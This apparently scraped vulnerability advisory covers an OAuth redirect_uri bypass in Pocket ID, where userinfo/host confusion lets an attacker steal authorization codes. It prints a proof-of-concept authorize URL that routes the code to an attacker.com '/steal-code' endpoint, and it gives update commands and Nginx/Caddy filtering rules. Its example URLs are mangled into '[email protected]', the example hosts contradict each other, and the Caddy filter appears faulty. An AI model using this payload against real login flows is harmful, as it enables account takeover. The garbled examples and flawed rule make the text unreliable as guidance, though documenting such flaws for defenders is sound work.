Pocket ID, OAuth redirect_uri Validation Bypass via Userinfo/Host Confusion

Listen to this Post

The vulnerability in Pocket ID arises from a flaw in how the application validates callback URLs (redirect_uri) during the OAuth flow. The vulnerable versions performed pattern checks on the callback URL using basic string methods or delimiter-based matching. The core issue is that the validation logic failed to correctly parse and distinguish the host portion of a URL when it contained userinfo (the part before the @ symbol). By crafting a redirect_uri that includes userinfo, an attacker can manipulate the validation process. For example, a legitimate callback pattern might be https://example.com/callback`. An attacker could register a client with this pattern but then initiate an authorization request with a redirect_uri likehttps://[email protected]/callback`. The vulnerable parser might incorrectly interpret the host as `legitimate.com` due to the presence of the @ symbol, passing the pattern check, while a proper URL parser would see the host as attacker.com. This confusion allows a malicious redirect_uri to bypass the validation checks. If a user is tricked into clicking a malicious link, the authorization code generated by Pocket ID will be sent to the attacker-controlled host specified in the manipulated redirect_uri. This leads to the theft of an authorization code, which the attacker can then exchange for access tokens, effectively compromising the user’s account and allowing unauthorized access to protected resources. The fix implemented in the patched version moves away from fragile string matching to robust, structured URL pattern parsing to correctly identify the host and prevent such confusion.

dailycve form:

Platform: Pocket ID
Version: < v2.3.1
Vulnerability : OAuth Redirect Validation Bypass
Severity: Critical
date: 09 March 2026

Prediction: Already Patched

What Undercode Say:

Analytics

Check current version of Pocket ID (if self-hosted)
Example command to check running Docker container version
docker inspect pocket-id | grep -i version
Verify if your instance is running a vulnerable commit
Vulnerable commits are before 3a339e33191c31b68bf57db907f800d9de5ffbc8
git log | grep "3a339e33191c31b68bf57db907f800d9de5ffbc8"

Exploit

Conceptual Proof of Concept (PoC) URL structure
Assumes legitimate registered redirect_uri is: https://app.example.com/oauth/callback
Malicious redirect_uri using userinfo (@) to confuse the host parser
The vulnerable app might see 'app.example.com' while a proper URL parser sees 'attacker.com'
https://idp.pocket-id.local/authorize?
response_type=code&
client_id=malicious-client&
redirect_uri=https://[email protected]/steal-code&
scope=openid%20profile
After user authenticates, the authorization code is sent to:
GET https://attacker.com/steal-code?code=AUTH_CODE_HERE

Protection from this CVE

1. Update to the patched version
For Docker deployments:
docker pull ghcr.io/pocket-id/pocket-id:latest
docker-compose up -d
2. For source code deployments, pull the specific fix
git pull origin main
git checkout 3a339e33191c31b68bf57db907f800d9de5ffbc8
3. If immediate patching is not possible, implement a workaround at the reverse proxy level.
Example Nginx configuration to block requests with '@' in the redirect_uri parameter:
if ($arg_redirect_uri ~ "@") {
return 403;
}
Example Caddy directive to filter malicious redirect_uri
@blocked {
query redirect_uri=@
}
respond @blocked 403

Impact

  • Authorization Code Leakage: An attacker can steal a valid authorization code.
  • Account Takeover: The stolen code can be exchanged for access and refresh tokens, leading to full account compromise.
  • Data Breach: Unauthorized access to user data and protected resources within the Pocket ID ecosystem.
  • Supply Chain Risk: Compromised identities can be used to access other applications that rely on Pocket ID for authentication.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top